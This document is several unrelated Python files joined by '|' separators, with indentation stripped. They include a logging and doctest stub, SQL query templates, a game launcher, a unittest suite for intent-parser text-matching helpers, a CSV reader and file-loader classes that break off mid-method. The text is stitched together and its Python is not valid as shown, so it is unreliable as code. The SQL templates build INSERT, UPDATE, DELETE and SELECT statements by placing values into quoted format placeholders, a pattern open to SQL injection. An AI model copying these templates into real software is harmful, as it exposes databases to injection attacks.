# Classes
# =============================================================================
# =============================================================================
# Module initialization
# =============================================================================
# init logging system
logger = logging.getLogger('kamrecsys')
if not logger.handlers:
logger.addHandler(logging.NullHandler())
# =============================================================================
# Test routine
# =============================================================================
def _test():
""" test function for this module
"""
# perform doctest
import sys
import doctest
doctest.testmod()
sys.exit(0)
# Check if this is call as command script
if __name__ == '__main__':
_test()
|
GET_USER = """
SELECT *
FROM users
WHERE user_id={}
"""
INSERT_USER = """
INSERT INTO users
VALUES ({}, '{}', {}, '{}', '{}')
"""
DELETE_USER = """
DELETE FROM users
WHERE user_id={}
"""
UPDATE_USER = """
UPDATE users
SET
name = '{}',
age = {},
gender = '{}',
country = '{}'
WHERE
user_id = {}
"""
SELECT_MODEL = """
SELECT *
FROM rf_model
WHERE model_name = '{}'
"""
|
import RockPaperScissors.game as rps
game = rps.Game()
game.run(True)
|
from intent_parser.server.intent_parser_server import IntentParserServer
from intent_parser.utils.intent_parser_utils import IPSMatch
import intent_parser.utils.intent_parser_utils as intent_parser_utils
import unittest
class IpsUtilsTest(unittest.TestCase):
def setUp(self):
"""
These tests exercise intent_parser_utils helpers directly, so no per-test setup is required.
"""
pass
def get_idx_for_search(self, search_results, comp):
"""
Given a list of indices into search_results, return the corresponding entries
"""
return [search_results[c] for c in comp]
def test_find_overlaps(self):
"""
"""
####################################
# Test cases with wrong paragraph indices, expected no overlaps
search_results = [{"paragraph_index" : 0, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 2, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 3, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'}]
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
self.assertTrue(len(overlaps) == 1)
self.assertTrue(max_idx == start_idx)
self.assertTrue(overlaps[0] == search_results[start_idx])
####################################
# Test for no overlaps
search_results = [{"paragraph_index" : 0, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 32, "end_offset" : 35, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 38, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 2, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 2, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 2, "offset": 18, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 2, "offset": 22, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
]
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
self.assertTrue(len(overlaps) == 1)
self.assertTrue(max_idx == start_idx)
self.assertTrue(overlaps[0] == search_results[start_idx])
####################################
# Test for overlaps off the right end
search_results = [{"paragraph_index" : 0, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 18, "end_offset" : 26, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 8, "end_offset" : 12, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 24, "end_offset" : 35, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 0, 1 : 7}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
# Reverse of previous test
search_results = [{"paragraph_index" : 0, "offset": 8, "end_offset" : 12, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 24, "end_offset" : 35, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 18, "end_offset" : 26, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 6, 1 : 1}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
####################################
# Test for overlaps off the left end
search_results = [{"paragraph_index" : 0, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 18, "end_offset" : 26, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 0, 1 : 7}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
# Reverse of previous test
search_results = [{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 18, "end_offset" : 26, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 6, 1 : 1}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
####################################
# Test for overlaps query inside comp
search_results = [{"paragraph_index" : 0, "offset": 3, "end_offset" : 5, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 12, "end_offset" : 18, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 6, 1 : 7}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
# Reverse of previous test
search_results = [{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 3, "end_offset" : 5, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 12, "end_offset" : 18, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 0, 1 : 1}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
####################################
# Test for overlaps comp inside query
search_results = [{"paragraph_index" : 0, "offset": 0, "end_offset" : 8, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 8, "end_offset" : 22, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 0, 1 : 1}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
# Reverse of previous test
search_results = [{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 0, "end_offset" : 8, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 8, "end_offset" : 22, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 6, 1 : 7}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
####################################
# Test ignore idx
search_results = [{"paragraph_index" : 0, "offset": 0, "end_offset" : 8, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 8, "end_offset" : 22, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 0, 1 : 1}
ignore_idx = [6,7]
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results, ignore_idx)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
# Reverse of previous test
search_results = [{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 0, "end_offset" : 8, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 8, "end_offset" : 22, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 6, 1 : 7}
ignore_idx = [6,7]
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results, ignore_idx)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
def test_find_text(self):
"""
Basic check, ensure that find_text runs and the results are as expected
"""
# Basic sanity checks
partial_match_min_size = 3
partial_match_thresh = 0.75
#####
# Refuse a match when the dict term has a match, but the larger term is too large
text = 'M9'
paragraphs = [{'elements': [{'startIndex': 5696, 'endIndex': 5710, 'textRun': {'content': 'M9_glucose_CAA', 'textStyle': {'underline': True, 'foregroundColor': {'color': {'rgbColor': {'red': 0.06666667, 'green': 0.33333334, 'blue': 0.8}}}, 'link': {'url': 'https://hub.sd2e.org/user/sd2e/design/M9_glucose_CAA/1'}}}}, {'startIndex': 5710, 'endIndex': 5712, 'textRun': {'content': ' \n', 'textStyle': {}}}], 'paragraphStyle': {'namedStyleType': 'NORMAL_TEXT', 'lineSpacing': 100, 'direction': 'LEFT_TO_RIGHT', 'spacingMode': 'COLLAPSE_LISTS', 'avoidWidowAndOrphan': False}}]
abs_start_offset = 5693
results = intent_parser_utils.find_text(text, abs_start_offset, paragraphs, partial_match_min_size, partial_match_thresh)
self.assertTrue(len(results) == 0)
#####
# Refuse a match when the dict term and content are the same, the content is linked, and the link matches
text = 'MG1655_LPV3_LacI_Sensor_pTac_AmeR_pAmeR_YFP'
abs_start_offset = 0
paragraphs = [{'elements': [{'startIndex': 196, 'endIndex': 229, 'textRun': {'content': 'MG1655_LPV3_LacI_Sensor_pTac_AmeR', 'textStyle': {'underline': True, 'foregroundColor': {'color': {'rgbColor': {'red': 0.06666667, 'green': 0.33333334, 'blue': 0.8}}}, 'fontSize': {'magnitude': 10, 'unit': 'PT'}, 'link': {'url': 'https://hub.sd2e.org/user/sd2e/design/MG1655_LPV3_LacI_Sensor_pTac_AmeR/1'}}}}, {'startIndex': 229, 'endIndex': 230, 'textRun': {'content': '\n', 'textStyle': {'bold': True}}}], 'paragraphStyle': {'namedStyleType': 'NORMAL_TEXT', 'lineSpacing': 115, 'direction': 'LEFT_TO_RIGHT', 'avoidWidowAndOrphan': False}}]
results = intent_parser_utils.find_text(text, abs_start_offset, paragraphs, partial_match_min_size, partial_match_thresh)
self.assertTrue(len(results) == 0)
#####
# Make a match when the dict term and content are the same, the content is linked, but the link differs
text = 'M9 Media Salts'
abs_start_offset = 0
paragraphs = [{'elements': [{'startIndex': 5147, 'endIndex': 5161, 'textRun': {'content': 'M9 media salts', 'textStyle': {'underline': True, 'foregroundColor': {'color': {'rgbColor': {'red': 0.06666667, 'green': 0.33333334, 'blue': 0.8}}}, 'fontSize': {'magnitude': 11.5, 'unit': 'PT'}, 'link': {'url': 'https://hub.sd2e.org/user/sd2e/design/teknova_M1902/1'}}}}, {'startIndex': 5161, 'endIndex': 5249, 'textRun': {'content': ' (6.78 g/L Na2HPO4, 3 g/L KH2PO4, 1 g/L NH4Cl, 0.5 g/L NaCl; Sigma- Aldrich, MO, M6030)\n', 'textStyle': {'fontSize': {'magnitude': 11.5, 'unit': 'PT'}}}}], 'paragraphStyle': {'namedStyleType': 'NORMAL_TEXT', 'direction': 'LEFT_TO_RIGHT', 'spacingMode': 'COLLAPSE_LISTS', 'indentFirstLine': {'magnitude': 18, 'unit': 'PT'}, 'indentStart': {'magnitude': 36, 'unit': 'PT'}}, 'bullet': {'listId': 'kix.ppm0fwxp8ech', 'textStyle': {'fontSize': {'magnitude': 11.5, 'unit': 'PT'}}}}]
results = intent_parser_utils.find_text(text, abs_start_offset, paragraphs, partial_match_min_size, partial_match_thresh)
self.assertTrue(len(results) == 1)
text = 'MG1655'
abs_start_offset = 0
paragraphs = [{"elements": [
{
"startIndex": 3645,
"endIndex": 3676,
"textRun": {
"content": "1- a control strain (Wild-type ",
"textStyle": {}
}
},
{
"startIndex": 3676,
"endIndex": 3682,
"textRun": {
"content": "MG1655",
"textStyle": {}
}
},
{
"startIndex": 3682,
"endIndex": 3684,
"textRun": {
"content": ")\n",
"textStyle": {}
}
}
]}]
#####
# Refuse a match when the dict term has a match, but the larger term is too large
text = 'pTac'
abs_start_offset = 0
paragraphs = [{'elements': [{'startIndex': 196, 'endIndex': 229, 'textRun': {'content': 'MG1655_LPV3_LacI_Sensor_pTac_AmeR', 'textStyle': {'underline': True, 'foregroundColor': {'color': {'rgbColor': {'red': 0.06666667, 'green': 0.33333334, 'blue': 0.8}}}, 'fontSize': {'magnitude': 10, 'unit': 'PT'}}}}, {'startIndex': 229, 'endIndex': 230, 'textRun': {'content': '\n', 'textStyle': {'bold': True}}}], 'paragraphStyle': {'namedStyleType': 'NORMAL_TEXT', 'lineSpacing': 115, 'direction': 'LEFT_TO_RIGHT', 'avoidWidowAndOrphan': False}}]
results = intent_parser_utils.find_text(text, abs_start_offset, paragraphs, partial_match_min_size, partial_match_thresh)
self.assertTrue(len(results) == 0)
#####
# Refuse a match when the dict term has a match, but it is too small
text = 'YG_plasmid_002'
abs_start_offset = 0
paragraphs = [{'elements': [{'startIndex': 196, 'endIndex': 229, 'textRun': {'content': 'plasmid', 'textStyle': {'underline': True, 'foregroundColor': {'color': {'rgbColor': {'red': 0.06666667, 'green': 0.33333334, 'blue': 0.8}}}, 'fontSize': {'magnitude': 10, 'unit': 'PT'}}}}, {'startIndex': 229, 'endIndex': 230, 'textRun': {'content': '\n', 'textStyle': {'bold': True}}}], 'paragraphStyle': {'namedStyleType': 'NORMAL_TEXT', 'lineSpacing': 115, 'direction': 'LEFT_TO_RIGHT', 'avoidWidowAndOrphan': False}}]
results = intent_parser_utils.find_text(text, abs_start_offset, paragraphs, partial_match_min_size, partial_match_thresh)
self.assertTrue(len(results) == 0)
def test_find_common_substrings(self):
"""
Basic check, ensure that find_common_substrings runs and the results are as expected
"""
############
content = 'm9 + glucose + caa:\n'
term = 'm9'
matches = intent_parser_utils.find_common_substrings(content.lower(), term.lower(), IntentParserServer.PARTIAL_MATCH_MIN_SIZE, IntentParserServer.PARTIAL_MATCH_THRESH)
self.assertTrue(len(matches) == 1)
self.assertTrue(matches[0].size == 2)
self.assertTrue(matches[0].content_word_length == 2)
############
content = '}, plate_{proteomics} \n'
term = 'proteomics'
matches = intent_parser_utils.find_common_substrings(content.lower(), term.lower(), IntentParserServer.PARTIAL_MATCH_MIN_SIZE, IntentParserServer.PARTIAL_MATCH_THRESH)
self.assertTrue(len(matches) == 1)
self.assertTrue(matches[0].size == 10)
self.assertTrue(matches[0].content_word_length == 10)
############
content = 'Dna roteomics arabinose proteom arabinose\n'
term = 'L-arabinose'
matches = intent_parser_utils.find_common_substrings(content.lower(), term.lower(), IntentParserServer.PARTIAL_MATCH_MIN_SIZE, IntentParserServer.PARTIAL_MATCH_THRESH)
gt_match = [IPSMatch(a=14, b=2, size=9, content_word_length=9), IPSMatch(a=32, b=2, size=9, content_word_length=9)]
self.assertTrue(len(matches) == 2)
self.assertTrue(gt_match == matches)
############
content = 'Dna roteomics arabinose proteom arabinose\n'
term = 'proteomics'
matches = intent_parser_utils.find_common_substrings(content.lower(), term.lower(), IntentParserServer.PARTIAL_MATCH_MIN_SIZE, IntentParserServer.PARTIAL_MATCH_THRESH)
gt_match = [IPSMatch(a=4, b=1, size=9, content_word_length=9), IPSMatch(a=24, b=0, size=7, content_word_length=7)]
self.assertTrue(len(matches) == 2)
self.assertTrue(gt_match == matches)
############
content = 'Dna roteomics arabinose proteom arabinose\n'
term = 'proteo'
matches = intent_parser_utils.find_common_substrings(content.lower(), term.lower(), IntentParserServer.PARTIAL_MATCH_MIN_SIZE, IntentParserServer.PARTIAL_MATCH_THRESH)
gt_match = [IPSMatch(a=4, b=1, size=5, content_word_length=9), IPSMatch(a=24, b=0, size=6, content_word_length=7)]
self.assertTrue(len(matches) == 2)
self.assertTrue(gt_match == matches)
############
content = 'arabinose\n'
term = 'L-arabinose'
matches = intent_parser_utils.find_common_substrings(content.lower(), term.lower(), IntentParserServer.PARTIAL_MATCH_MIN_SIZE, IntentParserServer.PARTIAL_MATCH_THRESH)
gt_match = [IPSMatch(a=0, b=2, size=9, content_word_length=9)]
self.assertTrue(len(matches) == 1)
self.assertTrue(gt_match == matches)
def tearDown(self):
"""
Perform teardown.
"""
pass
if __name__ == "__main__":
unittest.main()
|
import sys, argparse, csv
parser = argparse.ArgumentParser(description='csv to postgres',\
fromfile_prefix_chars="@" )
parser.add_argument('file', help='csv file to import', action='store')
args = parser.parse_args()
csv_file = args.file
with open(csv_file, 'r') as csvfile:
for line in csvfile.readlines():
array = line.split(',')
first_item = array[0]
num_columns = len(array)
csvfile.seek(0)
reader = csv.reader(csvfile, delimiter=',')
included_cols = [3,9]
for row in reader:
content = list(row[i] for i in included_cols)
print(content)
|
class FileLoader(object):
def __init__(self, fname, coltypes = {}, separator = None):
self.types = coltypes
if type(fname) == str:
ofile = open(fname)
else:
ofile = fname
self.rows = [x.split(separator) for x in ofile]
def __getitem__(self, *args):
index = args[0]
if type(index) != int:
raise TypeError("The index must be an integer, but I got '%s'" % index)
row = tuple(self.types.get(colno, str)(colval)
for (colno, colval)
in enumerate(self.rows[index]))
return row
def __iter__(self):
class IterObject(object):
def __init__(self, fl):
self.iterable = fl
self.pointer = 0
def __next__(self):
try:
val = self.iterable[self.pointer]
self.pointer += 1
return val
except IndexError:
raise StopIteration
return IterObject(self)
class WheelLoader(object):
def __init__(self, fname):
if type(fname) == str:
ofile = open(fname)
else:
ofile = fname
self.rows = [self.splitRow(x) for x in ofile]
def splitRow(self, string):
elements = []
partial = string.lstrip()
while partial:
if partial[0] == "'":
elem, partial = self.__processString(partial)
else:
elem, partial = [x.lstrip() for x in self.__processNonString(partial)]
elements.append(elem)
return elements
def __processNonString(self, string):
splitted = string.split(' ', 1)
if len(splitted) < 2:
rest = ""
else:
rest = splitted[1].lstrip()
return splitted[0].strip(), rest
def __processString(self, string):
retval = ""
done = False
partial = string[1:]
while not done:
end = partial.find("'")
if end == -1:
raise ValueError("Missing end quote in [%s]" % string)
retval += partial[:end]
partial = partial[end+1:]
if partial.startswith("'"):
retval += "'"
partial = partial[1:]  # skip just the escaped (doubled) quote
if not partial.startswith(" "):
retval += "'"
else:
partial = partial.lstrip()
done = True
return retval, partial
def __getitem__(self, *args):
index = args[0]
if type(index) != int:
raise TypeError("The index must be an integer, but I got '%s'" % index)
return tuple(self.rows[index])
def __iter__(self):
class IterObject(object):
def __init__(self, fl):
self.iterable = fl
self.pointer = 0
def __next__(self):
try:
val = self.iterable[self.pointer]
self.pointer += 1
return val
